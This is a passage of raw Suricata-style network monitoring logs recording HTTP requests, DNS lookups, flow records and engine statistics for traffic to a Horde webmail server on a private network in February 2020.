rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5608}} 
{"timestamp":"2020-02-29T00:13:15.783714+0000","flow_id":579939444423429,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52750,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":957},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2491,"tx_id":2}} {"timestamp":"2020-02-29T00:13:16.036811+0000","flow_id":489251210174079,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34814,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7088},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":38922,"tx_id":0}} {"timestamp":"2020-02-29T00:13:17.187207+0000","flow_id":700400392481363,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34816,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5608},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":20700,"tx_id":0}} {"timestamp":"2020-02-29T00:13:18.890267+0000","flow_id":36278189856155,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46056,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32443,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:18.998610+0000","flow_id":36278189856155,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46056,"proto":"UDP","dns":{"type":"answer","id":32443,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:18.998610+0000","flow_id":36278189856155,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46056,"proto":"UDP","dns":{"type":"answer","id":32443,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:13:19.000188+0000","event_type":"stats","stats":{"uptime":14451,"capture":{"kernel_packets":135471,"kernel_drops":0},"decoder":{"pkts":135474,"bytes":93343332,"invalid":187,"ipv4":133979,"ipv6":8,"ethernet":135474,"raw":0,"null":0,"sll":0,"tcp":128673,"udp":5104,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099648},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2770,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2786,"synack":2777,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1809,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2331,"failed_udp":112},"tx":{"http":4663,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2411}},"flow_mgr":{"closed_pruned":2744,"new_pruned":15,"est_pruned":2375,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":23138,"memcap_state":0,"memcap_global":0},"http":{"memuse":78933,"memcap":0}}} 
{"timestamp":"2020-02-29T00:13:19.093745+0000","flow_id":875772497513137,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52752,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":409}} {"timestamp":"2020-02-29T00:13:19.093745+0000","flow_id":875772497513137,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52752,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":409},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":248,"tx_id":0}} {"timestamp":"2020-02-29T00:13:21.000327+0000","flow_id":1573653137124388,"event_type":"flow","src_ip":"192.168.10.130","src_port":34804,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1155,"bytes_toclient":5991,"start":"2020-02-29T00:11:40.125988+0000","end":"2020-02-29T00:12:20.586218+0000","age":40,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:13:21.000929+0000","flow_id":957166403243598,"event_type":"flow","src_ip":"192.168.10.122","src_port":34478,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:08:20.380494+0000","end":"2020-02-29T00:08:20.488895+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:13:24.094571+0000","flow_id":875772497513137,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52752,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":409},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":770,"tx_id":0}} {"timestamp":"2020-02-29T00:13:24.749341+0000","flow_id":780334029631261,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36750,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":57609,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:24.857976+0000","flow_id":780334029631261,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36750,"proto":"UDP","dns":{"type":"answer","id":57609,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:13:24.857976+0000","flow_id":780334029631261,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36750,"proto":"UDP","dns":{"type":"answer","id":57609,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:24.880383+0000","flow_id":1016531461094710,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34818,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:13:24.880383+0000","flow_id":1016531461094710,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34818,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":16,"tx_id":0}} 
{"timestamp":"2020-02-29T00:13:26.000189+0000","event_type":"stats","stats":{"uptime":14458,"capture":{"kernel_packets":135481,"kernel_drops":0},"decoder":{"pkts":135483,"bytes":93345767,"invalid":187,"ipv4":133988,"ipv6":8,"ethernet":135483,"raw":0,"null":0,"sll":0,"tcp":128680,"udp":5106,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7100224},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2771,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2787,"synack":2778,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1810,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2332,"failed_udp":112},"tx":{"http":4664,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2412}},"flow_mgr":{"closed_pruned":2745,"new_pruned":15,"est_pruned":2376,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":23139,"memcap_state":0,"memcap_global":0},"http":{"memuse":109003,"memcap":0}}} 
{"timestamp":"2020-02-29T00:13:27.000158+0000","flow_id":427648475654620,"event_type":"flow","src_ip":"192.168.10.122","src_port":47740,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:08:26.322012+0000","end":"2020-02-29T00:08:26.430911+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:13:28.000628+0000","flow_id":58766619475456,"event_type":"flow","src_ip":"192.168.10.122","src_port":49361,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":2,"bytes_toserver":174,"bytes_toclient":284,"start":"2020-02-29T00:08:26.884224+0000","end":"2020-02-29T00:08:27.119823+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:13:29.881739+0000","flow_id":1016531461094710,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34818,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} 
{"timestamp":"2020-02-29T00:13:31.000242+0000","flow_id":1144822130078229,"event_type":"flow","src_ip":"192.168.10.130","src_port":34806,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1171,"bytes_toclient":6580,"start":"2020-02-29T00:12:20.586261+0000","end":"2020-02-29T00:12:30.427636+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:31.396069+0000","flow_id":400710460705573,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45826,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":56583,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:31.504125+0000","flow_id":400710460705573,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45826,"proto":"UDP","dns":{"type":"answer","id":56583,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:31.504125+0000","flow_id":400710460705573,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45826,"proto":"UDP","dns":{"type":"answer","id":56583,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:31.556421+0000","flow_id":1477849603888713,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34820,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:13:31.556421+0000","flow_id":1477849603888713,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34820,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":205,"tx_id":0}} {"timestamp":"2020-02-29T00:13:31.570323+0000","flow_id":1353815243338707,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":42553,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":57985,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:31.678579+0000","flow_id":1353815243338707,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42553,"proto":"UDP","dns":{"type":"answer","id":57985,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:31.678579+0000","flow_id":1353815243338707,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42553,"proto":"UDP","dns":{"type":"answer","id":57985,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:13:31.777304+0000","flow_id":1477849603888713,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34820,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5052}} {"timestamp":"2020-02-29T00:13:33.000151+0000","event_type":"stats","stats":{"uptime":14465,"capture":{"kernel_packets":135505,"kernel_drops":0},"decoder":{"pkts":135522,"bytes":93356849,"invalid":187,"ipv4":134023,"ipv6":8,"ethernet":135522,"raw":0,"null":0,"sll":0,"tcp":128709,"udp":5112,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7100224},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2773,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2789,"synack":2780,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1812,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2335,"failed_udp":112},"tx":{"http":4667,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2415}},"flow_mgr":{"closed_pruned":2746,"new_pruned":15,"est_pruned":2378,"bypassed_pr
uned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":23139,"memcap_state":0,"memcap_global":0},"http":{"memuse":121715,"memcap":0}}} {"timestamp":"2020-02-29T00:13:33.001385+0000","flow_id":204108328578649,"event_type":"flow","src_ip":"192.168.10.130","src_port":34808,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":9,"bytes_toserver":1215,"bytes_toclient":7636,"start":"2020-02-29T00:12:27.634457+0000","end":"2020-02-29T00:12:32.916036+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:36.778490+0000","flow_id":1477849603888713,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34820,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5052},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":21937,"tx_id":1}} {"timestamp":"2020-02-29T00:13:39.000406+0000","flow_id":1562984426416529,"event_type":"flow","src_ip":"192.168.10.122","src_port":38137,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:08:38.305553+0000","end":"2020-02-29T00:08:38.414838+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:13:40.000141+0000","event_type":"stats","stats":{"uptime":14472,"capture":{"kernel_packets":135522,"kernel_drops":0},"decoder":{"pkts":135525,"bytes":93357047,"invalid":187,"ipv4":134026,"ipv6":8,"ethernet":135525,"raw":0,"null":0,"sll":0,"tcp":128712,"udp":5112,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099648},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2773,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2789,"synack":2780,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1812,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2335,"failed_udp":112},"tx":{"http":4667,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2415}},"flow_mgr":{"closed_pruned":2747,"new_pruned":15,"est_pruned":2378,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22808,"memcap_state":0,"memcap_global":0},"http":{"memuse":69891,"memcap":0}}} 
{"timestamp":"2020-02-29T00:13:41.000382+0000","flow_id":454818455014582,"event_type":"flow","src_ip":"192.168.10.130","src_port":34812,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1079,"bytes_toclient":5726,"start":"2020-02-29T00:12:34.904374+0000","end":"2020-02-29T00:12:40.104449+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:44.000537+0000","flow_id":931899127526949,"event_type":"flow","src_ip":"192.168.10.81","src_port":52732,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":10,"bytes_toserver":969,"bytes_toclient":8961,"start":"2020-02-29T00:12:38.423461+0000","end":"2020-02-29T00:12:43.700773+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:46.283999+0000","flow_id":302931236246879,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36289,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":53267,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:46.392737+0000","flow_id":302931236246879,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36289,"proto":"UDP","dns":{"type":"answer","id":53267,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:13:46.392737+0000","flow_id":302931236246879,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36289,"proto":"UDP","dns":{"type":"answer","id":53267,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:46.542266+0000","flow_id":36578839428506,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34822,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7092}} {"timestamp":"2020-02-29T00:13:47.000164+0000","event_type":"stats","stats":{"uptime":14479,"capture":{"kernel_packets":135522,"kernel_drops":0},"decoder":{"pkts":135525,"bytes":93357047,"invalid":187,"ipv4":134026,"ipv6":8,"ethernet":135525,"raw":0,"null":0,"sll":0,"tcp":128712,"udp":5112,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099072},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2773,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"